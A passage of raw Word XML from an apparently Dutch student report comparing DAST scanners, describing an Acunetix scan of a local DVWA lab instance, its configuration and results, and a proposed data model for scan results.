        <w:t xml:space="preserve"> verder kunnen gaan door in te loggen. DVWA kent een aantal configuraties maar, waar ik het meest in geïnteresseerd ben is de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Security level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Je kunt de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Security level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instellen op low(laag), medium, high(hoog) of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>impossible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> high</w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(onmogelijk hoog). Dit zal de kwetsbaarheid level van DVWA veranderen en zorgt voor een dynamische test omgeving. Voor deze test zal ik de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Security level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> op low plaatsen om zoveel mogelijk kwetsbaarheden te vinden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2F092" w14:textId="36477D7E" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Beide </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>DAST-tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zullen de lokale website </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00F0523E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, Hierop draait DVWA. Omdat er een inlog scherm is zullen beide </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>DAST-tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de inloggegevens username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en password: password gebruiken. Ik zal de scan configuratie erbij zetten voor elke </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. De mogelijke configuraties verschilt per </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t>. De configuraties kunnen op sommige punten verschillen</w:t>
      </w:r>
      <w:r w:rsidR="00FC5EBA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4868B3FA" w14:textId="0AEA60EB" w:rsidR="00740679" w:rsidRPr="00BA27A1" w:rsidRDefault="00B80922" w:rsidP="00B80922">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc491022073"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3.4.6</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Testen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="273E57A0" w14:textId="5FFECE0A" w:rsidR="00554FF4" w:rsidRPr="0086762B" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086762B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Test van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086762B">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DB45DCF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="008C4119" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4119">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4119">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4119">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>configuratie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B7F8905" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00D37ABB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve"> – dit is de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>doelwit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B84ED8" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">Business </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>Criticality</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>normal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve"> – dit bepaalt hoe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>crusiaal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve"> deze scan is voor jouw onderneming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B59FFD" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">Scan speed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>fast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve"> – snelheid van de scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC79FDB" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authenticatie</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>: username: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">’ &amp; password: ‘password’ - inloggegevens   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C3A3F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>Scan type: full scan – dit is een volledige scan er zijn naast deze 5 andere soorten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D636ABE" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t>Report: none – Keuze om gelijk een rapport te genereren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02A50F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37ABB">
        <w:t xml:space="preserve">Schedule: Instant – planning van de scan. </w:t>
      </w:r>
      <w:r>
        <w:t>Voor deze scan wil ik 1 instantie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12830678" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00D37ABB" w:rsidRDefault="00554FF4" w:rsidP="00554FF4"/>
    <w:p w14:paraId="479BF126" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00EE26B1" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r w:rsidRPr="00EE26B1">
        <w:t>Scan resultaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F2A8D" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Algemene informatie over de scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9044B4" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De scan heeft 11 minuten geduurd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8934C" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Er zijn 35,170 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gedaan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18277F49" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 121 locaties gevonden en gescand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4AE199" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gevonden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kwetbaarheden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59BD7F66" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 11 hoge kwetsbaarheden gevonden met een hoge risico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD5D92" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn 32 kwetsbaarheden gevonden met een medium risico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B8AFF" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Er zijn 78 kwetsbaarheden gevonden met een lage risico </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E60341F" w14:textId="7BF25D4C" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00691542">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00691542">
        <w:t xml:space="preserve"> geeft</w:t>
      </w:r>
      <w:r w:rsidR="00087353">
        <w:t xml:space="preserve"> DVWA, met low </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00087353">
        <w:t>security level</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00087353">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00691542">
        <w:t xml:space="preserve">een risico level van 3 wat de hoogst haalbaar is. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zegt zelf over deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>risco</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> level: ‘Kwetsbaarheden die gecategoriseerd zijn al</w:t>
      </w:r>
      <w:r w:rsidR="00930E8D">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meest gevaarlijk, het doelwit loopt maximale risico op om gehackt te worden en de diefstal van data’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED361D" w14:textId="77777777" w:rsidR="00711836" w:rsidRDefault="00711836" w:rsidP="00711836">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12351799" wp14:editId="1DBE1712">
            <wp:extent cx="4320540" cy="1274445"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="20955"/>
            <wp:docPr id="452" name="Afbeelding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threatlevel.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4338379" cy="1279707"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC8126" w14:textId="4B42E81E" w:rsidR="00554FF4" w:rsidRPr="008D4217" w:rsidRDefault="000D4F4B" w:rsidP="00711836">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.3</w:t>
      </w:r>
      <w:r w:rsidR="00711836">
        <w:t>.4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B35A43" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hoe ziet de datastructuur eruit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A6C72" w14:textId="3141C874" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Als je een </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ontwikkeld dan is het van belang om data over de scan te verzamelen en deze op een gestructureerde manier op te slaan in een database. Data is cruciaal voor het analyseren van een scan, de gebruiker wil immers achteraf kunnen zien hoe de scan is verlopen. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> verzameld om deze reden veel data en presenteert het op een gebruiksvriendelijke manier naar de eindgebruiker toe. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F1C6C" w14:textId="6556ABC6" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Na de scan heb ik de data van scan bekeken om te kunnen achterhalen welke entiteiten, tabellen en kolommen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gebruikt. Dit heb ik gedaan omdat ik wil weten hoe de datastructuur </w:t>
      </w:r>
      <w:r w:rsidR="00BC587F">
        <w:t>eruitziet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, wat van belang zal zijn bij het ontwikkelen van mijn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of concept.  Er zijn naar mijn mening vier entiteiten: Doelwit, Scan, Kwetsbaarheid en Rapport. Ik heb voor ieder entiteit een tabel gemaakt met de bijbehorende kolommen en daarbij de beschrijving van de kolom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033207E5" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Doelwit – Algemene informatie over de website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165998F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scans – Informatie over de configuratie van een scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C0D3BA" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kwetsbaarheid – informatie over de gevonden kwetsbaarheden van het doelwit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A08DA" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00554FF4" w:rsidP="001B33AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rapport – Algemene informatie over </w:t>
      </w:r>
      <w:r w:rsidR="0049001C">
        <w:t>het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rapport </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="309"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4528"/>
        <w:gridCol w:w="4534"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="158089D5" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="28CB2CC0" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Doelwit(Target) informatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="7F0CFD7D" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F34802D" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Adres</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C262959" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Host naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="7B0FC520" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3065B386" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48A4F31F" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Server naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="64D13757" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270A46CD" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Besturing systeem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504AE8C9" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Naam van besturing systeem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="6B679625" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4944FA05" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t xml:space="preserve">Technologieën </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76385D7E" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Programmeertalen die gebruikt zijn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="6A3F13F3" w14:textId="77777777" w:rsidTr="00D600A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4528" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FF7EE84" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Responsive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4534" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65863F81" w14:textId="77777777" w:rsidR="00CB3E4B" w:rsidRDefault="00CB3E4B" w:rsidP="00CB3E4B">
            <w:r>
              <w:t>Is de website schaalbaar of niet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="141" w:rightFromText="141" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="2157"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB3E4B" w14:paraId="4A7BCA96" w14:textId="77777777" w:rsidTr="00CB3E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
